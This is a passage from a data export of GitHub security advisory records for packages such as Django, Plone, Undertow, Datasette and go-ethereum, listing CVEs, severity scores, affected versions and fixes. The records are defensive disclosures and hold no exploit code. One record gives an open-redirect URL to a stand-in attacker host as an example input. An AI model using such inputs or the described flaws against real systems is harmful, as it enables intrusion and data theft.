'Go', 'name': 'github.com/ethereum/go-ethereum/cmd/evm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-19184'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/issues/18069'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/83e2761c3a13524bd5d6597ac08994488cf872ef'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/fb9f7261ec51e38eedb454594fc19f00de1a6834'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T18:58:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-rfhr-62xp-2fp2,2021-05-27T22:38:20Z,2021-06-08T23:19:21Z,,['CVE-2021-23387'],Open Redirect in trailing-slash,"The package trailing-slash before 2.0.1 are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::createTrailing(), as the web server uses relative URLs instead of absolute URLs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'trailing-slash'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23387'}, {'type': 'WEB', 'url': 'https://github.com/fardog/trailing-slash/commit/f8e66f1429308247e5a119d430203077d8f05048'}, {'type': 'WEB', 'url': 'https://github.com/fardog/trailing-slash/blob/f640ece055fe85275c983de5eb94661b95e35670/index.js%23L36'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TRAILINGSLASH-1085707'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:38:20Z', 'nvd_published_at': '2021-05-24T19:15:00Z'}" +1.4.0,GHSA-qjwc-v72v-fq6r,2022-02-11T21:11:27Z,2021-06-16T17:47:52Z,,['CVE-2021-20220'],HTTP request smuggling in Undertow,"A flaw was found in Undertow. A regression in the fix for CVE-2020-10687 was found. HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own. The highest threat from this vulnerability is to data confidentiality and integrity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.34'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20220'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/commit/9e797b2f99617fdad0471eaa88c711ee7f44605f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1923133'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0013/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:33:57Z', 'nvd_published_at': '2021-02-23T18:15:00Z'}" +1.4.0,GHSA-gpmh-g94g-qrhr,2021-06-24T19:20:56Z,2021-06-28T18:20:53Z,,[],Internal hidden fields are visible on to many associations in admin api,"### Impact +The admin api has exposed some internal hidden fields when an association has been loaded with a to many reference + +### Patches +We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-gpmh-g94g-qrhr'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:20:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-5gjg-jgh4-gppm,2021-10-05T16:37:09Z,2021-06-23T17:26:30Z,,[],Websocket requests did not call AuthenticateMethod,"### Impact + +Depending on implementation, a denial-of-service or privilege escalation vulnerability may occur in software that uses the `github.com/ecnepsnai/web` package with Web Sockets that have an AuthenticateMethod. + +The `AuthenticateMethod` is not called, and `UserData` will be nil in request methods. Attempts to read the `UserData` may result in a panic. + +This issue only affects web sockets where an `AuthenticateMethod` is supplied to the handle options. Users who do not use web sockets, or users who do not require authentication are not at risk. + +#### Example + +In the example below, one would expect that the `AuthenticateMethod` function would be called for each request to `/example` + +```go +handleOptions := web.HandleOptions{ + AuthenticateMethod: func(request *http.Request) interface{} { + // Assume there is logic here to check for an active sessions, look at cookies or headers, etc... + var session Session{} // Example + + return session + }, +} + +server.Socket(""/example"", handle, handleOptions) +``` + +However, the method is not called, and therefor the `UserData` parameter of the request object in the handle will be nil, when it would have been expected to be the `session` object we returned. + +### Patches + +Release v1.5.2 fixes this vulnerability. The authenticate method is now called for websocket requests. + +All users of the web package should update to v1.5.2 or later. + +### Workarounds + +You may work around this issue by making the authenticate method a named function, then calling that function at the start of the handle method for the websocket. Reject connections when the return value of the method is nil.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/ecnepsnai/web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ecnepsnai/web/security/advisories/GHSA-5gjg-jgh4-gppm'}, {'type': 'WEB', 'url': 'https://github.com/ecnepsnai/web/commit/5a78f8d5c41ce60dcf9f61aaf47a7a8dc3e0002f'}, {'type': 'PACKAGE', 'url': 'https://github.com/ecnepsnai/web'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0107'}]","{'cwe_ids': ['CWE-304'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:41:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-hm2p-fhwx-9285,2021-05-27T21:32:19Z,2021-06-15T16:11:38Z,,['CVE-2021-33509'],Incorrect Permission Assignment for Critical Resource in Plone,Plone through 5.2.4 allows remote authenticated managers to perform disk I/O via crafted keyword arguments to the ReStructuredText transform in a Python script.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33509'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/writing-arbitrary-files-via-docutils-and-python-script'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-732'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:32:19Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-mv55-23xp-3wp8,2021-06-15T19:56:20Z,2021-06-08T20:09:36Z,,['CVE-2021-3495'],Access control flaw in Kiali,"An incorrect access control flaw was found in the kiali-operator in versions before 1.33.0. This flaw allows an attacker with a basic level of access to the cluster (to deploy a kiali operand) to use this vulnerability and deploy a given image to anywhere in the cluster, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.33.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3495'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali-operator/pull/278'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1947361'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-003/'}]","{'cwe_ids': ['CWE-281'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-02T20:54:29Z', 'nvd_published_at': '2021-06-01T14:15:00Z'}" +1.4.0,GHSA-68w8-qjq3-2gfm,2022-02-14T22:19:16Z,2021-06-10T17:21:00Z,,['CVE-2021-33203'],Path Traversal in Django,"Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.24'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33203'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/053cc9534d174dc89daba36724ed2dcb36755b90'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/20c67a0693c4ede2b09af02574823485e82e4c8f'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/dfaba12cda060b8b292ae1d271b44bf810b1c5b9'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210727-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jun/02/security-releases/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:57:27Z', 'nvd_published_at': '2021-06-08T18:15:00Z'}" +1.4.0,GHSA-8f4m-hccc-8qph,2021-06-04T18:56:16Z,2021-06-01T21:38:33Z,,['CVE-2021-20191'],Insertion of Sensitive Information into Log File in ansible,"A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.19'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0'}, {'fixed': '2.10.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20191'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/73488'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/73489'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2021-20191'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1916813'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:27:31Z', 'nvd_published_at': '2021-05-26T21:15:00Z'}" +1.4.0,GHSA-xw7c-jx9m-xh5g,2021-10-05T17:23:33Z,2021-06-07T21:47:41Z,,[],Reflected cross-site scripting issue in Datasette,"### Impact + +The `?_trace=1` debugging feature in Datasette does not correctly escape generated HTML, resulting in a [reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) vulnerability. + +This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as [datasette-auth-passwords](https://datasette.io/plugins/datasette-auth-passwords) as an attacker could use the vulnerability to access protected data. + +### Patches + +Datasette 0.57 and 0.56.1 both include patches for this issue. + +### Workarounds + +If you run Datasette behind a proxy you can workaround this issue by rejecting any incoming requests with `?_trace=` or `&_trace=` in their query string parameters. + +### References + +- [OWASP guide to reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) +- [Datasette issue #1360](https://github.com/simonw/datasette/issues/1360) + +### For more information +If you have any questions or comments about this advisory: +* Open a discussion in [simonw/datasette](https://github.com/simonw/datasette/discussions) +* Email us at `swillison+datasette @ gmail.com` +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'datasette'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.56.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simonw/datasette/security/advisories/GHSA-xw7c-jx9m-xh5g'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonw/datasette'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-07T20:59:14Z', 'nvd_published_at': None}" +1.4.0,GHSA-4mg4-wvmx-5332,2021-05-27T21:39:48Z,2021-06-15T16:11:47Z,,['CVE-2021-33510'],Server-Side Request Forgery in Plone,"Plone through 5.2.4 allows remote authenticated managers to conduct SSRF attacks via an event ical URL, to read one line of a file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33510'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/server-side-request-forgery-via-event-ical-url'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:39:48Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-3xxv-p78r-4fc6,2023-08-30T22:11:04Z,2021-06-18T18:43:42Z,,['CVE-2021-28359'],Cross-site Scripting in Apache Airflow,"The ""origin"" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions <1.10.15 in 1.x series and affects 2.0.0 and 2.0.1 and 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515 but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH releases of the installed MINOR versions, example update to Python 3.6.13 if you are on Python 3.6. (Those contain the fix for CVE-2021-23336 https://nvd.nist.gov/vuln/detail/CVE-2021-23336).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.15'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28359'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8ce70088ba291f358e077cafdb14d174b7a1ce9a9d86d1b332d6367%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc005f4de9d9b0ba943ceb8ff5a21a5c6ff8a9df52632476698d99432@%3Cannounce.apache.org%3E'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:17:09Z', 'nvd_published_at': '2021-05-02T08:15:00Z'}" +1.4.0,GHSA-2jx8-v4hv-gx3h,2021-10-05T17:29:41Z,2021-06-28T16:45:47Z,,['CVE-2020-12642'],XXE vulnerability in Launch import,"| Release Date | Affected Projects | Affected Versions | Access Vector| Security Risk | +|--------------|-------------------|-------------------|---------------|---------------| +| Monday, May 4, 2020| [service-api](https://github.com/reportportal/service-api) | Every version, starting from 3.1.0 | Remote | Medium | + +### Impact +Starting from version 3.1.0 we introduced a new feature of JUnit XML launch import. Unfortunately XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file that uses external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. + +Report Portal versions 4.3.12+ and 5.1.1+ disables external entity resolution for theirs XML parser. + +We advise our users install the latest releases we built specifically to address this issue. + +### Patches +Fixed with https://github.com/reportportal/service-api/pull/1201 + +### Binary Download +https://bintray.com/epam/reportportal/service-api/5.1.1 +https://bintray.com/epam/reportportal/service-api/4.3.12 + +### Docker Container Download +* RP v4: `docker pull reportportal/service-api:4.3.12` +* RP v5: `docker pull reportportal/service-api:5.1.1` + +### Acknowledgement +The issue was reported to Report Portal Team by an external security researcher. +Our Team thanks Julien M. for reporting the issue. + +### For more information +If you have any questions or comments about this advisory email us: [support@reportportal.io](mailto:support@reportportal.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '4.3.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/reportportal/reportportal/security/advisories/GHSA-2jx8-v4hv-gx3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12642'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/pull/1201'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/commit/da4a012abdcc69f02f4255d81466f1f473b7f418'}, {'type': 'PACKAGE', 'url': 'https://github.com/reportportal/reportportal'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T16:45:26Z', 'nvd_published_at': '2020-05-04T16:15:00Z'}" +1.4.0,GHSA-57v4-m9jx-mh8r,2023-02-13T17:29:53Z,2021-06-08T23:05:19Z,,['CVE-2021-3499'],Improper Input Validation,"A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ovn-org/ovn-kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3499'}, {'type': 'WEB', 'url': 'https://github.com/ovn-org/ovn-kubernetes/pull/2169'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHBA-2021:1550'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-3499'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1949188'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T21:24:52Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}" +1.4.0,GHSA-32wr-8wxm-852c,2021-04-07T22:08:23Z,2021-06-22T15:24:59Z,,['CVE-2019-7725'],Deserialization of Untrusted Data in NukeViet,"includes/core/is_user.php in NukeViet before 4.3.04 deserializes the untrusted nvloginhash cookie (i.e., the code relies on PHP's serialization format when JSON can be used to eliminate the risk).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nukeviet/nukeviet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.04'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-7725'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/pull/2740/commits/05dfb9b4531f12944fe39556f58449b9a56241be'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/4.3.04/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/nukeviet4.3/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/compare/4.3.03...4.3.04'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:08:23Z', 'nvd_published_at': '2020-12-31T05:15:00Z'}" +1.4.0,GHSA-v592-xf75-856p,2021-05-21T21:52:58Z,2021-06-29T21:12:56Z,,['CVE-2020-26240'],Erroneous Proof of Work calculation in geth,"### Impact +An ethash mining DAG generation flaw in Geth could cause miners to erroneously calculate PoW in an upcoming epoch (estimated early January, 2021). This happened on the ETC chain on 2020-11-06. This issue is relevant only for miners, non-mining nodes are unaffected. + +### Patches +This issue is also fixed as of 1.9.24. Thanks to @slavikus for bringing the issue to our attention and writing the fix. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/consensus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-v592-xf75-856p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26240'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21793'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/d990df909d7839640143344e79356754384dcdd0'}, {'type': 'WEB', 'url': 'https://blog.ethereum.org/2020/11/12/geth_security_release/'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:52:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-gq67-pp9w-43gp,2021-05-07T21:12:38Z,2021-06-16T17:31:39Z,,['CVE-2021-26296'],Cryptographically weak CSRF tokens in Apache MyFaces,"In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application. + + +Mitigation: +Existing web.xml configuration parameters can be used to direct +MyFaces to use SecureRandom for CSRF token generation: + +org.apache.myfaces.RANDOM_KEY_IN_VIEW_STATE_SESSION_TOKEN=secureRandom +org.apache.myfaces.RANDOM_KEY_IN_CSRF_SESSION_TOKEN=secureRandom +org.apache.myfaces.RANDOM_KEY_IN_WEBSOCKET_SESSION_TOKEN=secureRandom",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.25'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.19'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26296'}, {'type': 'WEB', 'url': 'https://github.com/apache/myfaces/commit/cc6e1cc7b9aa17e52452f7f2657b3af9c421b2b2'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/MYFACES-4373'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2b73e2356c6155e9ec78fdd8f72a4fac12f3e588014f5f535106ed9b%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0007/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161484/Apache-MyFaces-2.x-Cross-Site-Request-Forgery.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/Feb/66'}]","{'cwe_ids': ['CWE-330', 'CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:12:38Z', 'nvd_published_at': '2021-02-19T09:15:00Z'}" +1.4.0,GHSA-p2rp-cmjq-r7wm,2021-05-04T20:57:28Z,2021-06-16T17:19:12Z,,['CVE-2020-11977'],Shell command injection in Apache Syncope,"In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11977'}, {'type': 'WEB', 'url': 'https://syncope.apache.org/security#CVE-2020-11977:_Remote_Code_Execution_via_Flowable_workflow_definition'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T20:57:28Z', 'nvd_published_at': '2020-09-15T20:15:00Z'}" +1.4.0,GHSA-r6h7-5pq2-j77h,2021-12-13T14:30:44Z,2021-06-15T16:10:11Z,,['CVE-2020-10729'],Insufficiently random values in Ansible,A flaw was found in the use of insufficiently random values in 